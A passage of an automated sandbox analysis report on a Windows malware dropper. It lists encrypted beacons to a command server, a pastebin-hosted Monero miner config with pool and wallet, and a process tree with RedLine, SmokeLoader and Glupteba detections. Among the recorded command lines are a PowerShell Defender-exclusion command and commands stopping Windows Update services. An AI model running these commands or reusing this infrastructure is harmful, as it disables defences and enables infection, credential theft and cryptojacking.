                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                            Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            7192.168.2.64973095.214.26.2880C:\Windows\explorer.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            Nov 10, 2023 15:36:47.796094894 CET243OUTPOST / HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Accept: */*
                                                                                                                                                            Referer: http://dqxfcxtqc.net/
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                            Content-Length: 278
                                                                                                                                                            Host: host-host-file8.com
                                                                                                                                                            Nov 10, 2023 15:36:47.796139956 CET244OUTData Raw: 10 87 f7 e3 1b f7 a6 c3 c2 39 7d 36 0a ca 96 fc 46 14 af 3e d1 31 1f e8 b9 e8 da 83 8a a0 97 86 1b b1 2e d3 6c 6f ce e1 e8 da f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d7 e1 89 77 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 0d 83 87 79
                                                                                                                                                            Data Ascii: 9}6F>1.lo}k\wu$f]dyKsq*YT8I=&EJs%Ny(&S5ry_&/z'6w+VA1iZB]7SzpIn]v/2C#Te7M\]<[q\aB@W
                                                                                                                                                            Nov 10, 2023 15:36:48.097372055 CET244INHTTP/1.0 503 Service Unavailable
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                            Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            8192.168.2.64973195.214.26.2880C:\Windows\explorer.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            Nov 10, 2023 15:36:48.470799923 CET245OUTPOST / HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Accept: */*
                                                                                                                                                            Referer: http://sxcdcfkj.com/
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                            Content-Length: 323
                                                                                                                                                            Host: host-host-file8.com
                                                                                                                                                            Nov 10, 2023 15:36:48.470834970 CET245OUTData Raw: 10 87 f7 e3 1b f7 a6 c3 c2 39 7d 36 0a ca 96 fc 46 14 af 3e d1 31 1f e8 b9 e8 da 83 8a a0 97 86 1b b1 2e d3 6c 6f ce e1 e8 da f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d7 e1 89 77 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 40 d8 b6 2d
                                                                                                                                                            Data Ascii: 9}6F>1.lo}k\wu$f]d@-@+TULh_8]+KJ6'bwMkMGdM.wPv65bd99)v?*n~tJv7~+T f{|lB1x<ImzD0
                                                                                                                                                            Nov 10, 2023 15:36:48.768601894 CET245INHTTP/1.0 503 Service Unavailable
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                            Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            9192.168.2.64973295.214.26.2880C:\Windows\explorer.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            Nov 10, 2023 15:36:49.338114023 CET246OUTPOST / HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Accept: */*
                                                                                                                                                            Referer: http://jlmfcqwlhw.org/
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                            Content-Length: 131
                                                                                                                                                            Host: host-host-file8.com
                                                                                                                                                            Nov 10, 2023 15:36:49.338149071 CET246OUTData Raw: 10 87 f7 e3 1b f7 a6 c3 c2 39 7d 36 0a ca 96 fc 46 14 af 3e d1 31 1f e8 b9 e8 da 83 8a a0 97 86 1b b1 2e d3 6c 6f ce e1 e8 da f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d7 e1 89 77 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 38 a2 b3 2c
                                                                                                                                                            Data Ascii: 9}6F>1.lo}k\wu$f]d8,C.zP9d^b6\lzX<ulQ`NW"[K
                                                                                                                                                            Nov 10, 2023 15:36:49.638225079 CET247INHTTP/1.0 503 Service Unavailable
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                            Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            0192.168.2.649719172.67.34.170443C:\Windows\explorer.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2023-11-10 14:35:59 UTC0OUTGET /raw/cZ2J3Upi HTTP/1.1
                                                                                                                                                            Accept: */*
                                                                                                                                                            Connection: close
                                                                                                                                                            Host: pastebin.com
                                                                                                                                                            User-Agent: cpp-httplib/0.9
                                                                                                                                                            2023-11-10 14:35:59 UTC0INHTTP/1.1 200 OK
                                                                                                                                                            Date: Fri, 10 Nov 2023 14:35:59 GMT
                                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                            Connection: close
                                                                                                                                                            x-frame-options: DENY
                                                                                                                                                            x-content-type-options: nosniff
                                                                                                                                                            x-xss-protection: 1;mode=block
                                                                                                                                                            cache-control: public, max-age=1801
                                                                                                                                                            CF-Cache-Status: EXPIRED
                                                                                                                                                            Last-Modified: Fri, 10 Nov 2023 13:54:58 GMT
                                                                                                                                                            Server: cloudflare
                                                                                                                                                            CF-RAY: 823f067088bfeb67-SEA
                                                                                                                                                            2023-11-10 14:35:59 UTC0INData Raw: 37 35 36 0d 0a 7b 0d 0a 09 22 61 6c 67 6f 22 3a 20 22 72 78 2f 30 22 2c 0d 0a 09 22 70 6f 6f 6c 22 3a 20 22 78 6d 72 2d 65 75 31 2e 6e 61 6e 6f 70 6f 6f 6c 2e 6f 72 67 22 2c 0d 0a 09 22 70 6f 72 74 22 3a 20 31 34 34 33 33 2c 0d 0a 09 22 77 61 6c 6c 65 74 22 3a 20 22 34 37 7a 33 66 71 57 33 77 4c 50 57 4a 34 41 43 46 65 74 4c 52 46 54 50 41 4b 57 57 71 77 70 37 66 68 46 37 67 64 61 56 44 57 66 48 59 43 69 55 52 75 61 38 69 41 72 34 6d 78 62 44 48 33 61 59 56 32 41 61 71 53 54 69 67 72 70 44 6e 4b 56 39 45 4d 35 4a 6a 67 73 34 54 4b 31 46 6e 51 71 2e 6c 61 74 65 73 74 2f 70 61 73 73 77 6f 72 64 22 2c 0d 0a 09 22 70 61 73 73 77 6f 72 64 22 3a 20 22 22 2c 0d 0a 09 22 72 69 67 2d 69 64 22 3a 20 22 22 2c 0d 0a 09 22 6b 65 65 70 61 6c 69 76 65 22 3a 20 66 61 6c
                                                                                                                                                            Data Ascii: 756{"algo": "rx/0","pool": "xmr-eu1.nanopool.org","port": 14433,"wallet": "47z3fqW3wLPWJ4ACFetLRFTPAKWWqwp7fhF7gdaVDWfHYCiURua8iAr4mxbDH3aYV2AaqSTigrpDnKV9EM5Jjgs4TK1FnQq.latest/password","password": "","rig-id": "","keepalive": fal
                                                                                                                                                            2023-11-10 14:35:59 UTC1INData Raw: 52 2e 65 78 65 2c 44 65 61 64 42 79 44 61 79 6c 69 67 68 74 2d 57 69 6e 36 34 2d 53 68 69 70 70 69 6e 67 2e 65 78 65 2c 50 6f 69 6e 74 42 6c 61 6e 6b 2e 65 78 65 2c 65 6e 6c 69 73 74 65 64 2e 65 78 65 2c 57 6f 72 6c 64 4f 66 54 61 6e 6b 73 2e 65 78 65 2c 53 6f 54 47 61 6d 65 2e 65 78 65 2c 46 69 76 65 4d 5f 62 32 31 38 39 5f 47 54 41 50 72 6f 63 65 73 73 2e 65 78 65 2c 4e 61 72 61 6b 61 42 6c 61 64 65 70 6f 69 6e 74 2e 65 78 65 2c 72 65 38 2e 65 78 65 2c 53 6f 6e 69 63 20 43 6f 6c 6f 72 73 20 2d 20 55 6c 74 69 6d 61 74 65 2e 65 78 65 2c 69 77 36 73 70 36 34 5f 73 68 69 70 2e 65 78 65 2c 52 6f 63 6b 65 74 4c 65 61 67 75 65 2e 65 78 65 2c 43 79 62 65 72 70 75 6e 6b 32 30 37 37 2e 65 78 65 2c 46 69 76 65 4d 5f 47 54 41 50 72 6f 63 65 73 73 2e 65 78 65 2c 52
                                                                                                                                                            Data Ascii: R.exe,DeadByDaylight-Win64-Shipping.exe,PointBlank.exe,enlisted.exe,WorldOfTanks.exe,SoTGame.exe,FiveM_b2189_GTAProcess.exe,NarakaBladepoint.exe,re8.exe,Sonic Colors - Ultimate.exe,iw6sp64_ship.exe,RocketLeague.exe,Cyberpunk2077.exe,FiveM_GTAProcess.exe,R
                                                                                                                                                            2023-11-10 14:35:59 UTC2INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                            Data Ascii: 0


                                                                                                                                                            Click to jump to process

                                                                                                                                                            Click to jump to process

                                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                                            Click to jump to process

                                                                                                                                                            Target ID:0
                                                                                                                                                            Start time:15:34:56
                                                                                                                                                            Start date:10/11/2023
                                                                                                                                                            Path:C:\Users\user\Desktop\file.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:C:\Users\user\Desktop\file.exe
                                                                                                                                                            Imagebase:0x880000
                                                                                                                                                            File size:13'188'608 bytes
                                                                                                                                                            MD5 hash:E2982DF7BD07C80FFDD02A7D680B64BC
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                                                            Reputation:low
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:2
                                                                                                                                                            Start time:15:34:57
                                                                                                                                                            Start date:10/11/2023
                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\InstallSetup5.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\InstallSetup5.exe"
                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                            File size:2'671'908 bytes
                                                                                                                                                            MD5 hash:BC3354A4CD405A2F2F98E8B343A7D08D
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Antivirus matches:
                                                                                                                                                            • Detection: 50%, ReversingLabs
                                                                                                                                                            Reputation:moderate
                                                                                                                                                            Has exited:false

                                                                                                                                                            Target ID:3
                                                                                                                                                            Start time:15:34:58
                                                                                                                                                            Start date:10/11/2023
                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\toolspub2.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\toolspub2.exe"
                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                            File size:270'848 bytes
                                                                                                                                                            MD5 hash:DCBD05276D11111F2DD2A7EDF52E3386
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Yara matches:
                                                                                                                                                            • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000003.00000002.2155575698.0000000000952000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                            Antivirus matches:
                                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                                            • Detection: 34%, ReversingLabs
                                                                                                                                                            Reputation:moderate
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:4
                                                                                                                                                            Start time:15:34:58
                                                                                                                                                            Start date:10/11/2023
                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\Broom.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\Broom.exe
                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                            File size:5'515'264 bytes
                                                                                                                                                            MD5 hash:00E93456AA5BCF9F60F84B0C0760A212
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:Borland Delphi
                                                                                                                                                            Yara matches:
                                                                                                                                                            • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000004.00000000.2106864524.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\Broom.exe, Author: Joe Security
                                                                                                                                                            Antivirus matches:
                                                                                                                                                            • Detection: 21%, ReversingLabs
                                                                                                                                                            Reputation:moderate
                                                                                                                                                            Has exited:false

                                                                                                                                                            Target ID:5
                                                                                                                                                            Start time:15:34:58
                                                                                                                                                            Start date:10/11/2023
                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe"
                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                            File size:4'360'056 bytes
                                                                                                                                                            MD5 hash:2A92DBDA3DF9502DEF5E1C9009950699
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Yara matches:
                                                                                                                                                            • Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 00000005.00000003.2160724822.0000000003CA2000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000005.00000002.4576083277.0000000002F70000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                            • Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 00000005.00000002.4559431109.0000000000843000.00000040.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 00000005.00000002.4576083277.00000000033B3000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000005.00000002.4575660571.0000000002B6B000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                            Antivirus matches:
                                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                                            • Detection: 47%, ReversingLabs
                                                                                                                                                            Reputation:low
                                                                                                                                                            Has exited:false

                                                                                                                                                            Target ID:6
                                                                                                                                                            Start time:15:34:59
                                                                                                                                                            Start date:10/11/2023
                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\latestX.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\latestX.exe"
                                                                                                                                                            Imagebase:0x7ff7db320000
                                                                                                                                                            File size:5'874'968 bytes
                                                                                                                                                            MD5 hash:BAE29E49E8190BFBBF0D77FFAB8DE59D
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Antivirus matches:
                                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                                            • Detection: 71%, ReversingLabs
                                                                                                                                                            Reputation:moderate
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:7
                                                                                                                                                            Start time:15:35:00
                                                                                                                                                            Start date:10/11/2023
                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                                                                                                                                            Imagebase:0x7ff6e3d50000
                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                                                            Reputation:high
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:8
                                                                                                                                                            Start time:15:35:01
                                                                                                                                                            Start date:10/11/2023
                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                            Imagebase:0x7ff66e660000
                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:9
                                                                                                                                                            Start time:15:35:02
                                                                                                                                                            Start date:10/11/2023
                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\toolspub2.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\toolspub2.exe"
                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                            File size:270'848 bytes
                                                                                                                                                            MD5 hash:DCBD05276D11111F2DD2A7EDF52E3386
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Yara matches:
                                                                                                                                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000009.00000002.2281261302.00000000004E1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000009.00000002.2281261302.00000000004E1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000009.00000002.2281176476.00000000004B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000009.00000002.2281176476.00000000004B0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                            Reputation:moderate
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:10
                                                                                                                                                            Start time:15:35:05
                                                                                                                                                            Start date:10/11/2023
                                                                                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:powershell -nologo -noprofile
                                                                                                                                                            Imagebase:0xc90000
                                                                                                                                                            File size:433'152 bytes
                                                                                                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                                                            Reputation:high
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:11
                                                                                                                                                            Start time:15:35:05
                                                                                                                                                            Start date:10/11/2023
                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                            Imagebase:0x7ff66e660000
                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:13
                                                                                                                                                            Start time:15:35:07
                                                                                                                                                            Start date:10/11/2023
                                                                                                                                                            Path:C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                                                            Imagebase:0x7ff765610000
                                                                                                                                                            File size:192'336 bytes
                                                                                                                                                            MD5 hash:D098F2FC042FBF6879D47E3A86FBB4A1
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:moderate
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:14
                                                                                                                                                            Start time:15:35:07
                                                                                                                                                            Start date:10/11/2023
                                                                                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
                                                                                                                                                            Imagebase:0x7ff7403e0000
                                                                                                                                                            File size:55'320 bytes
                                                                                                                                                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Has exited:false

                                                                                                                                                            Target ID:15
                                                                                                                                                            Start time:15:35:07
                                                                                                                                                            Start date:10/11/2023
                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
                                                                                                                                                            Imagebase:0x7ff7f6ec0000
                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:16
                                                                                                                                                            Start time:15:35:08
                                                                                                                                                            Start date:10/11/2023
                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                            Imagebase:0x7ff66e660000
                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:17
                                                                                                                                                            Start time:15:35:08
                                                                                                                                                            Start date:10/11/2023
                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe
                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                            File size:4'360'056 bytes
                                                                                                                                                            MD5 hash:2A92DBDA3DF9502DEF5E1C9009950699
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Yara matches:
                                                                                                                                                            • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000011.00000002.4575750686.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                            • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000011.00000002.4575377290.0000000002B16000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                            • Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 00000011.00000003.2270531809.0000000003C42000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 00000011.00000002.4560534739.0000000000843000.00000040.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 00000011.00000002.4575750686.0000000003353000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            Has exited:false

                                                                                                                                                            Target ID:18
                                                                                                                                                            Start time:15:35:08
                                                                                                                                                            Start date:10/11/2023
                                                                                                                                                            Path:C:\Windows\System32\sc.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:sc stop UsoSvc
                                                                                                                                                            Imagebase:0x7ff78fb20000
                                                                                                                                                            File size:72'192 bytes
                                                                                                                                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:19
                                                                                                                                                            Start time:15:35:08
                                                                                                                                                            Start date:10/11/2023
                                                                                                                                                            Path:C:\Windows\explorer.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                            Imagebase:0x7ff609140000
                                                                                                                                                            File size:5'141'208 bytes
                                                                                                                                                            MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Has exited:false

                                                                                                                                                            Target ID:20
                                                                                                                                                            Start time:15:35:08
                                                                                                                                                            Start date:10/11/2023
                                                                                                                                                            Path:C:\Windows\System32\sc.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:sc stop WaaSMedicSvc
                                                                                                                                                            Imagebase:0x7ff78fb20000
                                                                                                                                                            File size:72'192 bytes
                                                                                                                                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:21
                                                                                                                                                            Start time:15:35:08
                                                                                                                                                            Start date:10/11/2023
                                                                                                                                                            Path:C:\Windows\System32\sc.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:sc stop wuauserv
                                                                                                                                                            Imagebase:0x7ff78fb20000
                                                                                                                                                            File size:72'192 bytes
                                                                                                                                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
